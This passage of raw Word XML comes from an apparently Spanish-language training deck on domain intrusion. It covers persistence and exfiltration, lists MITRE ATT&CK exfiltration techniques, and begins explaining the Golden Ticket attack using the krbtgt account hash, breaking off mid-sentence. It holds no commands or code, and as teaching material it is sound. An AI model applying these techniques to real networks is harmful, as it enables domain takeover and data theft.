        <w:pStyle w:val="Ttulo6"/>
        <w:spacing w:line="655" w:lineRule="exact"/>
        <w:ind w:left="1032" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Persistencia y exfiltración</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D14DF36" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74C3D595" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17E5B376" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="209"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487703552" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5F3CFEE2" wp14:editId="420B171E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>112758</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>302983</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="11953240" cy="4145915"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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53240" cy="4145915"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="11953240" cy="4145915"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="539" name="Image 539"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId271" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="11952766" cy="4145596"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="540" name="Image 540"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId272" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="164609" y="164712"/>
                            <a:ext cx="11637264" cy="3829811"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="433A79A7" id="Group 538" o:spid="_x0000_s1026" style="position:absolute;margin-left:8.9pt;margin-top:23.85pt;width:941.2pt;height:326.45pt;z-index:-15612928;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordsize="119532,414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">
                <v:shape id="Image 539" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:119527;height:4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">
                  <v:imagedata r:id="rId273" o:title=""/>
                </v:shape>
                <v:shape id="Image 540" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:1646;top:1647;width:116372;height:38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">
                  <v:imagedata r:id="rId274" o:title=""/>
                </v:shape>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="622272EF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="700" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EA01616" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="117"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E7C2CF9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1861"/>
        </w:tabs>
        <w:spacing w:before="1" w:line="552" w:lineRule="exact"/>
        <w:ind w:left="1861" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Una vez que se identifiquen los activos críticos con suficientes privilegios, los adversarios intentarán</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD62446" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:line="552" w:lineRule="exact"/>
        <w:ind w:left="1863"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Establezca la persistencia a largo plazo e intente exfiltrar los datos de forma sigilosa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3A66C5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21858F80" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="97"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BDEE5C3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1861"/>
        </w:tabs>
        <w:ind w:left="1861" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Para la exfiltración de datos, el adversario puede usar varios protocolos para permanecer bajo el capó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51212F86" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0128FEAD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="98"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CBEE1E8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1862"/>
        </w:tabs>
        <w:ind w:left="1862" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Algunas de las técnicas de exfiltración de datos se mencionan a continuación:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61ED3774" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2582"/>
        </w:tabs>
        <w:spacing w:before="42"/>
        <w:ind w:left="2582" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId275">
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:color w:val="0462C1"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>Exfiltración automatizada</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="0462C1"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single" w:color="0462C1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:hyperlink r:id="rId276">
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:color w:val="0462C1"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>T1020</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="0462C1"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single" w:color="0462C1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64754EFE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2582"/>
        </w:tabs>
        <w:spacing w:before="45"/>
        <w:ind w:left="2582" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId277">
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:color w:val="0462C1"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>Exfiltración sobre protocolo alternativo</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="0462C1"/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single" w:color="0462C1"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:hyperlink r:id="rId278">
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:color w:val="0462C1"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>T1048</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="0462C1"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single" w:color="0462C1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03645360" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2582"/>
        </w:tabs>
        <w:spacing w:before="45"/>
        <w:ind w:left="2582" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId279">
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:color w:val="0462C1"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>Exfiltración sobre medio físico</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="0462C1"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single" w:color="0462C1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:hyperlink r:id="rId280">
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:color w:val="0462C1"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>T1052</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="0462C1"/>
          <w:spacing w:val="-14"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single" w:color="0462C1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADF28F9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2582"/>
        </w:tabs>
        <w:spacing w:before="42"/>
        <w:ind w:left="2582" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId281">
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:color w:val="0462C1"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>Transferir datos a una cuenta en la nube</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="0462C1"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single" w:color="0462C1"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:hyperlink r:id="rId282">
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:color w:val="0462C1"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>T1537</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="0462C1"/>
          <w:spacing w:val="-17"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single" w:color="0462C1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E339A8C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1220" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CBCA847" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo7"/>
        <w:spacing w:line="573" w:lineRule="exact"/>
        <w:ind w:left="795"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>-&gt; Ataque del Boleto Dorado :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C908735" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="71"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F9FC6CF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1874"/>
        </w:tabs>
        <w:ind w:left="1874" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">El boleto dorado está firmado y encriptado con el hash de la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>cuenta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9AC2C5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F2EFC06" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="115"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="688740C7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1874"/>
        </w:tabs>
        <w:ind w:left="1874" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">El hash de la cuenta krbtgt se puede usar para hacerse pasar por cualquier </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>usuario</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
